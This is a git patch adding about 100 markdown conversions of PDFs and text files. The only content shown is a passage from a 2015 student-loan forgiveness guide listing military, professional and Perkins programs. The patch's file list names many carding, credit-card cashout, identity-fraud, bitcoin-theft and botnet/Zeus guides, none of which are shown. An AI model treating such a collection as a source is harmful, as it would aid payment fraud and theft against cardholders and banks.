From 82b86331e0b7726abe99c6a38d1f245e341690d2 Mon Sep 17 00:00:00 2001
From: drjones
Date: Tue, 19 May 2026 19:13:06 -0700
Subject: [PATCH] Add markdown exports
---
100-ways-to-get-rid-of-your-loan-2015_pdf.md | 2310 ++
10000 CARDING DORKS (1)_txt.md | 5727 ++++
10000 CARDING DORKS_txt.md | 5727 ++++
2017-2018DEEPWEBLINKS2_txt.md | 1314 +
2VPNS_txt.md | 9 +
3 Ways_To_Cash_Out bitcoin_pdf.md | 45 +
7 Days Rapid Rescore Strategy_2016_pdf.md | 65 +
A Carder_s First Experience_pdf.md | 87 +
...er License Identification Card-2000_pdf.md | 3275 ++
AMAZON ANDROID CARDING TECH_txt.md | 35 +
AMAZON CARDING MADE EASY_txt.md | 20 +
APPLE PAY - original_pdf.md | 59 +
All about pdf417 - 2D Barcodes_pdf.md | 272 +
BITCOINMEGAPACK FASTERLINK_txt.md | 179 +
BITCOIN_DOMINATION_pdf.md | 271 +
BONUS -BankDrops_pdf.md | 123 +
BONUS-ConvertCVVintoFULLZ_pdf.md | 45 +
Basics_of_Card_Printing_pdf.md | 413 +
...rding Tutorials Pack (66 tutorials)_pdf.md | 9447 ++++++
Bitcoin-za_klady-a-stavebni_-kameny_pdf.md | 151 +
Bitcoin_Step_By_Step_2nd_Edition_pdf.md | 1063 +
Botnet Guide Complete_pdf.md | 1918 ++
Brute Ratel EULA_pdf.md | 183 +
CASHOUTBANKACCTCODE10FULLZ_txt.md | 36 +
CC CASHOUT METHOD UPDATED_pdf.md | 5 +
CC cashout method1_pdf.md | 22 +
CC to BTC - 3methods_pdf.md | 5 +
CC to BTC NO KYC_pdf.md | 190 +
CCNewbs_pdf.md | 1058 +
CVV Cashout Via BTC_pdf.md | 31 +
... Vocabulary and understanding terms_pdf.md | 117 +
CardingUniversity_pdf.md | 1996 ++
Cashing Out (UK)_txt.md | 42 +
...VV To Money Easily - Private method_pdf.md | 48 +
...out cc_cvv or fullz-online shopping_pdf.md | 76 +
Change-Your-Identity-2011a_pdf.md | 12787 ++++++++
Crypto_Cash_pdf.md | 567 +
Cyber Triage Evaluation Guide_3v10_pdf.md | 110 +
DONT GET CAUGHT CARDING_pdf.md | 226 +
Dr Cleans PayPal Methods_pdf.md | 416 +
EBAYCARDING_txt.md | 100 +
FREEOPENVPNPROXYANDPPTPVPN_txt.md | 6 +
Goodwill letter 1_pdf.md | 31 +
...astestWaytoGetCreditCardCredentials_pdf.md | 23 +
HACKINGBANK ACCOUNT INFO_txt.md | 28 +
HOW TO CREATE A NEW EUROPEANSSNANDORID_txt.md | 83 +
Hacked PayPal to Bitcoin_pdf.md | 27 +
Hippa_Clear_Medical_Debts_pdf.md | 54 +
...to Earn Bitcoins for Free_ Udated 1_pdf.md | 65 +
How to get 100_000 bits_pdf.md | 172 +
... a new Identity Ariza Research 2008_pdf.md | 11777 +++++++
Howto steal bitcoin 4.0_pdf.md | 670 +
INSTRUCTIONS_pdf.md | 70 +
Kingpin - Kevin Poulsen_pdf.md | 9830 ++++++
MASTERTHEARTOFCARDINGBEGINNERSGUIDE_txt.md | 148 +
MMO CURRENCY RUNSCAPE_pdf.md | 284 +
Mining Botnet_pdf.md | 287 +
MisterBitcoins Paypal Guide_pdf.md | 602 +
...s Marketing Approach To Selling Ids_pdf.md | 74 +
NEW2017WESTERNUNIONSCAMTUTORIAL_txt.md | 200 +
NON VBV 2017_txt.md | 78 +
PIN Cracking - Recovery Attacks_pdf.md | 895 +
PIN Cracking - UCAM-CL-TR-560_pdf.md | 526 +
PIN Cracking-comsec-09_pdf.md | 627 +
Remove Tax Liens_pdf.md | 33 +
STRIPE CC TO BTC METHOD_txt.md | 41 +
Sample-Goodwill-Letter-3_pdf.md | 35 +
Secrets of ID Man_pdf.md | 2456 ++
SecureKey Programming_pdf.md | 25607 ++++++++++++++++
Security Laminate Patent_pdf.md | 5 +
Several Cashouts To BTC_pdf.md | 107 +
Syngress - Hack Proofing Linux (2001)_pdf.md | 22118 +++++++++++++
The Bitcoin Bible_pdf.md | 778 +
...y to Make 200000_ Satoshi Right Now_pdf.md | 90 +
...Ultimate-Bitcoin-Money-Making-Guide_pdf.md | 200 +
...al Technitium MAC Address Changer 2_pdf.md | 56 +
...rial Technitium MAC Address Changer_pdf.md | 56 +
ULTIMATE CC to BTC_pdf.md | 82 +
US Passport - RFID biometric_pdf.md | 4925 +++
Ultimate Carding Guide_pdf.md | 2366 ++
Ultimate Cashout_pdf.md | 393 +
... Accounts and How to Withdraw Guide_pdf.md | 131 +
VISA-TDES_Updates_pdf.md | 167 +
VerifyPAYPALwithoutCreditcard_txt.md | 50 +
... Hacks _Team DDU - By Mitch Tulloch_pdf.md | 16871 ++++++++++
[Sacky]GetUnlimitedNumbers 2_pdf.md | 51 +
[Sacky]GetUnlimitedNumbers_pdf.md | 51 +
allCC2_pdf.md | 132 +
api-ratel-war-room_pdf.md | 1026 +
beginnerscarding tutorial_txt.md | 98 +
bitcoin_pioneer_pdf.md | 842 +
cc to bitcoin_txt.md | 74 +
cc2btc SKRILL_pdf.md | 58 +
cobalt_cobalt-strike_userguide_pdf.md | 13080 ++++++++
howtobe a procarder carding checklist_txt.md | 58 +
makemoneytradingbitcoin_txt.md | 6 +
mobilecarding_pdf.md | 63 +
paypal declinerecovery techmnique_txt.md | 59 +
readme.md | 0
requirements-convert-md_txt.md | 7 +
virtual bitcoin_pdf.md | 692 +
zeus-guide_pdf.md | 97 +
102 files changed, 170088 insertions(+)
create mode 100644 100-ways-to-get-rid-of-your-loan-2015_pdf.md
create mode 100644 10000 CARDING DORKS (1)_txt.md
create mode 100644 10000 CARDING DORKS_txt.md
create mode 100644 2017-2018DEEPWEBLINKS2_txt.md
create mode 100644 2VPNS_txt.md
create mode 100644 3 Ways_To_Cash_Out bitcoin_pdf.md
create mode 100644 7 Days Rapid Rescore Strategy_2016_pdf.md
create mode 100644 A Carder_s First Experience_pdf.md
create mode 100644 AAMVA National Standard for the Driver License Identification Card-2000_pdf.md
create mode 100644 AMAZON ANDROID CARDING TECH_txt.md
create mode 100644 AMAZON CARDING MADE EASY_txt.md
create mode 100644 APPLE PAY - original_pdf.md
create mode 100644 All about pdf417 - 2D Barcodes_pdf.md
create mode 100644 BITCOINMEGAPACK FASTERLINK_txt.md
create mode 100644 BITCOIN_DOMINATION_pdf.md
create mode 100644 BONUS -BankDrops_pdf.md
create mode 100644 BONUS-ConvertCVVintoFULLZ_pdf.md
create mode 100644 Basics_of_Card_Printing_pdf.md
create mode 100644 Big Carding Tutorials Pack (66 tutorials)_pdf.md
create mode 100644 Bitcoin-za_klady-a-stavebni_-kameny_pdf.md
create mode 100644 Bitcoin_Step_By_Step_2nd_Edition_pdf.md
create mode 100644 Botnet Guide Complete_pdf.md
create mode 100644 Brute Ratel EULA_pdf.md
create mode 100644 CASHOUTBANKACCTCODE10FULLZ_txt.md
create mode 100644 CC CASHOUT METHOD UPDATED_pdf.md
create mode 100644 CC cashout method1_pdf.md
create mode 100644 CC to BTC - 3methods_pdf.md
create mode 100644 CC to BTC NO KYC_pdf.md
create mode 100644 CCNewbs_pdf.md
create mode 100644 CVV Cashout Via BTC_pdf.md
create mode 100644 Carding Vocabulary and understanding terms_pdf.md
create mode 100644 CardingUniversity_pdf.md
create mode 100644 Cashing Out (UK)_txt.md
create mode 100644 Cashout CVV To Money Easily - Private method_pdf.md
create mode 100644 Cashout cc_cvv or fullz-online shopping_pdf.md
create mode 100644 Change-Your-Identity-2011a_pdf.md
create mode 100644 Crypto_Cash_pdf.md
create mode 100644 Cyber Triage Evaluation Guide_3v10_pdf.md
create mode 100644 DONT GET CAUGHT CARDING_pdf.md
create mode 100644 Dr Cleans PayPal Methods_pdf.md
create mode 100644 EBAYCARDING_txt.md
create mode 100644 FREEOPENVPNPROXYANDPPTPVPN_txt.md
create mode 100644 Goodwill letter 1_pdf.md
create mode 100644 GuideFastestWaytoGetCreditCardCredentials_pdf.md
create mode 100644 HACKINGBANK ACCOUNT INFO_txt.md
create mode 100644 HOW TO CREATE A NEW EUROPEANSSNANDORID_txt.md
create mode 100644 Hacked PayPal to Bitcoin_pdf.md
create mode 100644 Hippa_Clear_Medical_Debts_pdf.md
create mode 100644 How to Earn Bitcoins for Free_ Udated 1_pdf.md
create mode 100644 How to get 100_000 bits_pdf.md
create mode 100644 How to get a new Identity Ariza Research 2008_pdf.md
create mode 100644 Howto steal bitcoin 4.0_pdf.md
create mode 100644 INSTRUCTIONS_pdf.md
create mode 100644 Kingpin - Kevin Poulsen_pdf.md
create mode 100644 MASTERTHEARTOFCARDINGBEGINNERSGUIDE_txt.md
create mode 100644 MMO CURRENCY RUNSCAPE_pdf.md
create mode 100644 Mining Botnet_pdf.md
create mode 100644 MisterBitcoins Paypal Guide_pdf.md
create mode 100644 Mr. Slaves Guide to the Unique Pin Business Cards Marketing Approach To Selling Ids_pdf.md
create mode 100644 NEW2017WESTERNUNIONSCAMTUTORIAL_txt.md
create mode 100644 NON VBV 2017_txt.md
create mode 100644 PIN Cracking - Recovery Attacks_pdf.md
create mode 100644 PIN Cracking - UCAM-CL-TR-560_pdf.md
create mode 100644 PIN Cracking-comsec-09_pdf.md
create mode 100644 Remove Tax Liens_pdf.md
create mode 100644 STRIPE CC TO BTC METHOD_txt.md
create mode 100644 Sample-Goodwill-Letter-3_pdf.md
create mode 100644 Secrets of ID Man_pdf.md
create mode 100644 SecureKey Programming_pdf.md
create mode 100644 Security Laminate Patent_pdf.md
create mode 100644 Several Cashouts To BTC_pdf.md
create mode 100644 Syngress - Hack Proofing Linux (2001)_pdf.md
create mode 100644 The Bitcoin Bible_pdf.md
create mode 100644 The EASIEST Way to Make 200000_ Satoshi Right Now_pdf.md
create mode 100644 The-Ultimate-Bitcoin-Money-Making-Guide_pdf.md
create mode 100644 Tutorial Technitium MAC Address Changer 2_pdf.md
create mode 100644 Tutorial Technitium MAC Address Changer_pdf.md
create mode 100644 ULTIMATE CC to BTC_pdf.md
create mode 100644 US Passport - RFID biometric_pdf.md
create mode 100644 Ultimate Carding Guide_pdf.md
create mode 100644 Ultimate Cashout_pdf.md
create mode 100644 Unlimited Stealth Paypal Accounts and How to Withdraw Guide_pdf.md
create mode 100644 VISA-TDES_Updates_pdf.md
create mode 100644 VerifyPAYPALwithoutCreditcard_txt.md
create mode 100644 Windows Server Hacks _Team DDU - By Mitch Tulloch_pdf.md
create mode 100644 [Sacky]GetUnlimitedNumbers 2_pdf.md
create mode 100644 [Sacky]GetUnlimitedNumbers_pdf.md
create mode 100644 allCC2_pdf.md
create mode 100644 api-ratel-war-room_pdf.md
create mode 100644 beginnerscarding tutorial_txt.md
create mode 100644 bitcoin_pioneer_pdf.md
create mode 100644 cc to bitcoin_txt.md
create mode 100644 cc2btc SKRILL_pdf.md
create mode 100644 cobalt_cobalt-strike_userguide_pdf.md
create mode 100644 howtobe a procarder carding checklist_txt.md
create mode 100644 makemoneytradingbitcoin_txt.md
create mode 100644 mobilecarding_pdf.md
create mode 100644 paypal declinerecovery techmnique_txt.md
create mode 100644 readme.md
create mode 100644 requirements-convert-md_txt.md
create mode 100644 virtual bitcoin_pdf.md
create mode 100644 zeus-guide_pdf.md
diff --git a/100-ways-to-get-rid-of-your-loan-2015_pdf.md b/100-ways-to-get-rid-of-your-loan-2015_pdf.md
new file mode 100644
index 0000000..df6ec19
--- /dev/null
+++ b/100-ways-to-get-rid-of-your-loan-2015_pdf.md
@@ -0,0 +1,2310 @@
+# 100-ways-to-get-rid-of-your-loan-2015
+
+
+---
+
+100+ Ways To Get Rid Of Your Student Loans
+(Without Paying Them)
+An (Almost) Comprehensive Guide To
+Student Loan Forgiveness And Discharge
+Last updated: June 4, 2015
+
+American Student Assistance, SALT, SALT logo, and Money knowledge for college—and beyond are trademarks of American
+Student Assistance.
+© 2014-2015 American Student Assistance. All rights reserved.
+
+Contents
+Part One: Introduction ................................................................................................................ 5
+Part Two: Loan Forgiveness Options ......................................................................................... 9
+Community Service ...............................................................................................................10
+Military ...................................................................................................................................11
+Profession .............................................................................................................................14
+State Specific ........................................................................................................................23
+Part Three: Loan Discharge Options .........................................................................................69
+Closed Schools/School Error .................................................................................................70
+Disaster .................................................................................................................................71
+Financial Hardship .................................................................................................................71
+Fraud .....................................................................................................................................74
+Medical ..................................................................................................................................75
+Part Four: Other Useful Stuff .....................................................................................................78
+Glossary ................................................................................................................................79
+Links And References ...........................................................................................................80
+About SALT ..............................................................................................................................81
+
+Part One: Introduction
+
+So, What Is This Thing?
+In short, this eBook is our latest collection of the different options that may forgive, discharge, or
+pay for all or a portion of your federal student loans. For this 2015 edition, we’ve rounded up
+more than 100 programs that fall into these categories!
+Why We Created This
+Quite frankly, because we’re awesome. But really, because we care about your success
+managing your student loans.
+The amount of options out there is dizzying and confusing, and we think it’s cruel to make you
+figure it out all on your own. Also, we haven’t found another resource out there that covers all
+the options like this does (and we’d know—we work in student loans).
+We figured you might want some help, and you might not like that help to come in the form of a
+big, intimidating table or webpage. So we wrote this easy-to-navigate book and did our best to
+collect everything in one place. There may be more options out there, and some of the ones
+here may change, so it’s always good to do your own research too. Still, we hope you think this
+resource is a helpful jumping-off point.
+Ground Rules: What Are Forgiveness And Discharge?
+Student loan forgiveness and discharge are programs instituted by the federal government (as
+well as some state governments, organizations, and businesses) that eliminate all or part of a
+student’s loans if he or she qualifies. These options exist to help borrowers shoulder the burden
+of student debt if they give back to their community, work in fields or areas of need, or face
+unpredicted, extenuating circumstances.
+The difference between loan forgiveness and discharge is the circumstances that can cancel
+the debt. Loan discharges usually occur if there is no way the borrower can pay a loan (e.g., a
+total and permanent disability or death) or if a borrower can no longer apply the education for
+which the loan was granted (e.g., the school the borrower was attending closed before they
+could finish their program).
+Loan forgiveness happens when the forgiving party (e.g., the government) determines that the
+borrower has given back to the community in a way they’ve specified, like through teaching or
+public service. Special repayment programs can act as a form of forgiveness as well. Federal
+and state governments, as well as organizations, offer these programs to promote service in
+needed fields or high-need areas.
+Covering Your Bases
+Though forgiveness is a huge opportunity for any do-gooders out there, planning a career and
+loan payments around it may not be the best idea. Regulations change, you may not meet all
+the requirements, or forgiveness could take longer than you think. Make sure to prepare for
+these possibilities—and have a backup plan.
+
+You should never take on student loan debt assuming that you will be able to forgive all or part
+of it down the road. Always borrow the bare minimum you need, and think of any potential
+forgiveness benefits as a (very) happy bonus.
+Also, know that the IRS considers many student loan forgiveness options to be taxable—so if
+you do have some or all of your loans forgiven, the forgiven amount may end up affecting your
+tax bill at the end of the year. To determine if forgiveness is taxable, the IRS will generally look
+at whether the forgiveness occurred due to the borrower fulfilling a service requirement. If you
+are fulfilling a service requirement to receive forgiveness, then the IRS will generally not tax the
+amount. However, you should consult a tax professional to determine whether the forgiveness
+you receive is taxable.
+You can read more about this at www.irs.gov.
+Applying For Forgiveness
+To apply for forgiveness, you may need proof that you worked for the required number of years
+at the location or in the profession that makes you eligible for forgiveness.
+We linked all of the forms for the listed forgiveness options, but a simple Google search may
+allow you to find other possibilities as well. Be wary of scams and the fine print before filing for
+anything. You shouldn’t have to pay to apply for forgiveness or discharge.
+Using This Book
+We designed this eBook to help you discover, access, and learn more about what options for
+forgiveness are available to you. We highlighted eligibility criteria, qualifying loans, and the
+steps for pursuing an option—including links to the forms you need to apply. There’s also a
+glossary at the end of the book if you need to know the difference between loan types or
+repayment options.
+A few quick notes:
+ This book is not all-inclusive by any means. Many employers offer student loan
+repayment benefits, and there may be other forgiveness programs that we haven’t
+found. It’s also not a magic wand—you can’t wave it in front of your loans to make them
+disappear (sorry). The programs we highlight are real, but they’re not immediate.
+ You may not find a program you’re eligible for in here. If that’s the case, it never hurts to
+ask around at your place of employment, city, state, or even any social clubs or sports
+teams you may participate in to see if they offer some kind of loan repayment benefit—
+you never know!
+ We’ve updated this book as of the date on the cover, but unfortunately, sometimes
+programs like these can change or get phased out. Be sure to check the sites we’ve
+linked to for up-to-date information.
+ Also, be sure to visit the sites we’ve linked to for complete eligibility requirements. These
+programs have lots of ins and outs (you didn’t think getting rid of your loans would be
+easy, right?), so we only included the highlights.
+
+OK, that’s it: Now, it’s time to dig in and see how you might be able to get rid of your loans
+without paying them!
+If you like this book and want to learn more about managing your student loans, check us out at
+saltmoney.org.
+
+Part Two: Loan Forgiveness Options
+
+Community Service
+The community service forgiveness plan listed here is for AmeriCorps members only. There are,
+however, other forgiveness plans available if you are active in community service. As always,
+funding and requirements are subject to change.
+Segal AmeriCorps Education Award
+To Be Eligible …
+This award is for borrowers who have successfully completed a term of national service in an
+approved AmeriCorps program (AmeriCorps VISTA, AmeriCorps NCCC, or AmeriCorps State
+and National). You must sign up to receive this award prior to serving with AmeriCorps, and it is
+awarded upon successful completion of service. You can use this award up to 7 years after
+completing your term of service.
+If you meet the requirements for this award, you may receive up to the maximum Pell grant
+allotment for the current year for up to 2 to 5 years, depending on which AmeriCorps program
+you serve in. For fiscal year 2015, this amount is $5,730.
+Please note: Unlike many other community service forgiveness awards, funds from the Segal
+AmeriCorps Education Award are taxable.
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+ Parent loans
+ Grad PLUS loans
+ Perkins loans
+ State-funded loans
+ Health Education Assistance Loans (HEAL)
+ Nursing Student Loans (NSL)
+ Primary Care Loans (PCL)
+ Supplemental Loans for Students (SLS)
+These loans may be eligible even if they are in default.
+Next Steps
+If you have questions regarding this scholarship, check out the AmeriCorps website.
+
+SponsorChange.org
+To Be Eligible …
+You must have graduated from college with student loan debt. This program allows borrowers to
+volunteer at participating nonprofits in need of manpower and, in return, have their student loan
+debt paid down by sponsors who have also signed up with SponsorChange.org.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Perkins loans
+ Consolidation loans
+ State loans
+ Institutional loans
+ Private student loans
+Next Steps
+Visit SponsorChange.org for more information.
+Military
+All of the following forgiveness plans require you to be a member of the U.S. military. This is not
+an exhaustive list. The funding and requirements for each program are subject to change.
+Additional qualifications are presented throughout.
+Active Duty Health Professions Loan Repayment Program
+To Be Eligible …
+You must be a fully qualified health professional as determined by a U.S. military branch in an
+identified skill shortage area. You must also be serving as a commissioned officer who is
+serving on active duty.
+Those who qualify for this program are eligible to have up to:
+ $40,000 per year for up to 3 years forgiven if you are in the dental, medical, allied health,
+nurse, or veterinary corps serving active duty.
+ $50,000 over 3 years forgiven if you are in the dental, medical, allied health, nurse, or
+veterinary corps serving in the reserves.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+
+ Consolidation loans
+ Perkins loans
+ Health Professions Student Loans (HPSL)
+ Private student loans
+Next Steps
+Click the name of this benefit in the title above to access the program’s webpage, and select
+“locate a recruiter” or “request more info” to learn how to apply.
+Air Force College Loan Repayment Program
+To Be Eligible…
+This program is for all newly enlisted servicemembers. You must sign up for the program when
+enlisting to receive up to 33 1/3% of your student loan balance each year for a total of 3 years
+($10,000 maximum).
+Loans That Qualify
+ Stafford loans
+ Consolidation loans
+ Parent PLUS loans
+ Grad PLUS loans
+ Perkins loans
+ Auxiliary Loan Assistance for Students (ALAS)
+ Federally Insured Student Loans (FISL)
+Next Steps
+Contact an Air Force adviser or recruiter to learn more.
+Army College Loan Repayment Program
+To Be Eligible …
+You must have been in active duty from December 1, 1980, through September 30, 1981, or
+after September 30, 1982. You must be a non-prior service accession and enlist with a high
+school diploma. And you must have an Armed Forces Qualification Test score of 50 or higher
+and enlist in a critical military occupational specialty (MOS); these specialties change quarterly.
+A local recruiter will have the current list.
+If you meet the requirements, you can receive 33 1/3% or $1,500 (whichever is greater) toward
+the remaining original unpaid principal on all qualifying loans for each successfully completed
+year of enlisted active duty, up to a total of $65,000. Accrued interest is not eligible for
+repayment.
+
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Parent PLUS loans
+ Consolidation loans
+ Perkins loans
+ Supplemental Loans for Students (SLS)
+Next Steps
+To apply for this forgiveness plan, contact an army recruiter.
+National Guard Student Loan Repayment
+To Be Eligible …
+You must enlist for a minimum of 6 years for a critical skills vacancy in the grade of E-4 or below
+into a qualifying position in a Modified Table of Organization and Equity (MTOE) or Medical
+Table of Distribution Allowances (TDA) unit only. You must score a minimum of 50 on the
+Armed Forces Qualification Test (AFQT).
+Those eligible for this forgiveness can receive up to $7,500 annually, with a maximum of
+$50,000.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+You must speak to a recruiter to apply for this forgiveness plan.
+Navy Loan Repayment Program
+To Be Eligible …
+This plan is for active-duty borrowers. You must have no prior military experience and enlist for
+a minimum of 3 years. If you meet requirements, you are eligible to receive 33 1/3% of the
+remaining principal balance or $1,500 (whichever is greater) per year, with a maximum of
+$65,000.
+Loans That Qualify
+
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+Next Steps
+More information on this and other Navy college and tuition programs is available here.
+Profession
+Qualifications for the following forgiveness programs are based on your career. Not all careers
+are eligible for forgiveness programs, and this list is not all-inclusive. The funding and
+requirements for each program are subject to change. You may find more career-based
+forgiveness programs with an online search or by talking to your employer.
+Attorney Student Loan Repayment Program
+To Be Eligible …
+Any U.S. Department of Justice employee serving in or hired to serve in an attorney position
+may be considered for this repayment program. If selected, the individual must complete a 3-
+year service obligation.
+Loans That Qualify
+ Stafford loans
+ Supplemental Loans for Students (SLS)
+ Grad PLUS loans
+ Federal Consolidation loans
+ Defense loans made before July 1, 1972
+ National Direct Student loans made between July 1, 1972 and July 1, 1987
+ Perkins loans
+ Nursing Student Loans (NSL)
+ Health Profession Student Loan (HPSL)
+ Health Education Assistance Loans (HEAL)
+Next Steps
+The application is available at the link above.
+Faculty Loan Repayment Program (FLRP)
+
+To Be Eligible …
+You must be a U.S. citizen or a lawful permanent resident. This repayment program is available
+to degree-trained health professionals from disadvantaged backgrounds serving on the faculty
+at accredited health profession colleges and universities.
+This form of forgiveness will forgive up to $40,000 for 2 years of service. The program also
+provides funds to offset the tax burden associated with the forgiveness. Applicants will be
+funded first if they obtain a written agreement from the eligible health profession school stating
+that the school will match equal FLRP loan repayments.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State or local government education loans
+Next Steps
+The 2015-2016 application will be available in May 2015. You can sign up to be notified of this
+by email.
+Indian Health Services Loan Repayment Program
+To Be Eligible …
+You must commit to a 2-year service obligation to practice in certain health professions full time
+at an Indian health program site. The site must provide quality health care services to American
+Indian and Alaska Native communities.
+Eligible applicants to this forgiveness plan can receive up to $20,000 per year for an initial 2
+years, and additional years may be added for continued service.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans (only loans included that were borrowed for your health professions
+degree are eligible)
+ Private student loans
+ Institutional loans
+ Perkins loans
+
+You must have borrowed the loans to pay for health profession schools and related expenses,
+as well as undergraduate prerequisites that were required for the graduate degree.
+Next Steps
+Find more information on how to apply for this repayment program here.
+John R. Justice Student Loan Repayment Program
+To Be Eligible …
+You must be an attorney continually licensed to practice law and be at least one of the following:
+ A prosecutor employed full time by a state or unit of local government (including tribal
+government) who prosecutes criminal or juvenile delinquency cases at the state or unit
+of local government level. (Prosecutors who are employees of the federal government
+are not eligible.)
+ A public defender who is either a full-time employee of a state or unit of local
+government (including tribal government) or a full-time employee of a nonprofit
+organization operating under a contract with a state or unit of local government who
+provides legal representation to indigent persons in criminal or juvenile delinquency
+cases.
+ A full-time federal defender attorney in a defender organization providing legal
+representation to indigent persons in criminal or juvenile delinquency cases pursuant to
+Subsection (g) of section 3006A of Title 18, United States Code.
+ An attorney providing supervision, education, or training of other persons providing
+prosecutor or public defender representation.
+Awards are dependent upon which state you reside and practice in, as well as the state’s
+funding allocation each year.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Federal consolidation loans
+Next Steps
+Contact your state’s designated agency to apply.
+National Health Service Corps
+To Be Eligible …
+This forgiveness plan is available to licensed primary care medical, dental, and mental and
+behavioral health providers who are working at high-need sites.
+If you qualify, you could receive up to $50,000 for an initial 2-year commitment. Eligibility for
+additional repayment is given by applying for additional years.
+
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ State loans
+Next Steps
+Learn more about the application process for this forgiveness program here.
+National Institutes Of Health (NIH) Loan Forgiveness
+To Be Eligible …
+You must be a U.S. citizen, U.S. national, or U.S. permanent resident. You must also have a
+health professional doctoral degree, have qualified educational debt in excess of 20% of
+institutional base salary at the time of the award, and perform research that is supported by a
+domestic nonprofit foundation, university, professional association, U.S. government agency, or
+other nonprofit.
+You must engage in qualified research that represents 50% of your level of effort and consumes
+an average of at least 20 hours per week during each quarterly service period during the
+contract. You must also conduct research that is not prohibited by federal law, regulations, or
+policies of the U.S. Department of Health and Human Sciences or NIH. Part-time federal
+employees working fewer than 20 hours per week who meet other criteria may apply.
+Eligible applicants can receive up to $35,000 per year
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ State-issued loans (includes Washington, D.C., Puerto Rico, and any U.S. held territory)
+ Academic institution loans
+ MEDLOANS
+ Private student loans
+Spousal consolidation loans cannot be included
+
+Next Steps
+If you think you’re eligible, you can apply to this program here.
+NURSE Corps Loan Repayment Program
+To Be Eligible …
+This program is for registered nurses and advanced-practice registered nurses working in a
+critical shortage facility or nurse faculty in return for working full time at an accredited school of
+nursing.
+Eligible applicants can receive up to 60% of their loans paid for them for a 2-year service
+agreement and up to 85% for service of 3 years.
+Loans That Qualify
+ Stafford loans
+ Grad PLUS loans
+ Consolidation loans
+ Perkins loans
+ Private student loans
+ Supplemental Loans for Students (SLS)
+ Nursing Student Loans (NSL)
+You must have obtained your loans to cover nursing educational expenses or living expenses
+while studying nursing. Non-nursing education expenses are ineligible.
+Next Steps
+Borrowers can apply for this program here.
+Perkins Loan Cancellation And Discharge
+To Be Eligible …
+Perkins loans have unique requirements for loan cancellation based on the field you work in.
+Schools award these federal, low-interest loans to high-need students attending or planning to
+attend college. Approximately 1,700 participating schools offer Perkins loans.
+Depending on their profession (see list below), Perkins loan borrowers can have up to 100% of
+their loan cancelled over the course of 5 years (except when indicated). Here’s how it works:
+ 15% of their principal balance and accrued interest can be cancelled after their first and
+second year of qualifying service.
+ 20% of their principal balance and accrued interest can be cancelled after their third and
+fourth year.
+
+ 30% of their principal balance and accrued interest can be cancelled after their
+fifth year.
+Perkins loans also offer concurrent deferment if you are performing qualifying service.
+Combining that postponement with these cancellation options means you could potentially
+never have to make payments on these loans.
+The professions eligible for cancellation and the requirements are listed below.
+ Attorney: You must be a full-time attorney employed in a federal public or community
+defender organization. You must perform qualified service that includes August 14,
+2008, or began on or after that date. You may receive up to 100% forgiveness of your
+loans.
+ Child or family services agency: You must be a full-time employee of a public or
+nonprofit child or family services agency providing services to high-risk children and their
+families from low-income communities. You may receive up to 100% forgiveness of your
+loans.
+ Firefighter: You must be a full-time firefighter whose service included August 14, 2008,
+or began on or after that date. Firefighters may receive up to 100% forgiveness of their
+loans.
+ Head Start: You must be a full-time staff member in the education component of a Head
+Start program. You may receive up to 100% forgiveness of your loans—15% of the
+principal balance and accrued interest for each year of service.
+ Imminent danger area: You must serve in the U.S. Armed Forces in a hostile fire or
+imminent danger area. You may receive forgiveness for up to 50% of your outstanding
+loans if your active duty ended before August 14, 2008. You may receive up to 100%
+forgiveness of your outstanding loans if your active duty includes or began after August
+14, 2008.
+ Intervention services provider: You must be a full-time qualified professional provider
+of early intervention services for the disabled. Service must include August 14, 2008, or
+have begun on or after that date. You may receive up to 100% forgiveness of your loans.
+ Law enforcement: You must be a full-time law enforcement or corrections officer. You
+may receive up to 100% forgiveness for your loans.
+ Librarian: You must be a librarian with a master’s degree working in a Title I-eligible
+elementary or secondary school or in a public library serving Title I-eligible schools.
+Work must include August 14, 2008, or have begun on or after that date. You may
+receive up to 100% forgiveness of your loans.
+ Nurse or medical technician: You must be a full-time nurse or medical technician. You
+may receive up to 100% forgiveness of your outstanding loans.
+ Prekindergarten or child care: You must be a full-time staff member in a
+prekindergarten or child care program that is licensed or regulated by a state. Work must
+include August 14, 2008, or have begun on or after that date. You may receive up to
+100% forgiveness of your loans.
+
+ Special education teacher: You must be a full-time special education teacher of
+children with disabilities in a public school, nonprofit elementary or secondary school, or
+educational service agency. If the service is at an educational service agency, it must
+include August 14, 2008, or have begun on or after that date. You may receive up to
+100% forgiveness of your loans.
+ Speech pathologist: You must be a full-time speech pathologist with a master’s degree
+working in a Title I-eligible elementary or secondary school. Your service must include
+August 14, 2008, or have begun on or after that date. You may receive up to 100%
+forgiveness of your loans.
+ Teacher at an educational service agency: You must be a full-time teacher in a
+designated educational service agency that serves students from low-income families.
+Your service must include August 14, 2008, or have begun on or after that date. You
+may receive up to 100% forgiveness of your loans.
+ Teacher in shortage area field: You must be a full-time teacher of math, science,
+foreign languages, bilingual education, or other fields designated as teacher shortage
+areas. You may receive up to 100% forgiveness of your loans.
+ Tribal college faculty member: You must be a full-time faculty member at a tribal
+college or university. Your service must include August 14, 2008, or have begun on or
+after that date. You may receive up to 100% forgiveness.
+ VISTA or Peace Corps volunteer: You must serve for a period of time in the
+AmeriCorps VISTA program or the Peace Corps. You may receive forgiveness for up to
+70% of your loans over the course of 4 years—15% of the principal balance and accrued
+interest for the first and second years and 20% of the principal balance and accrued
+interest for the third and fourth years.
+Loans That Qualify
+ Perkins loans
+Next Steps
+To apply, contact your loan holder—which may be the school that you attended.
+Public Service Loan Forgiveness
+To Be Eligible …
+You must make 120 qualifying payments under the standard, income-based, income-contingent,
+or Pay As You Earn repayment plan. (Payments made before October 1, 2007, and payments
+made while in default do not count.) You must have been working full time at a public service or
+nonprofit organization when you made these payments.
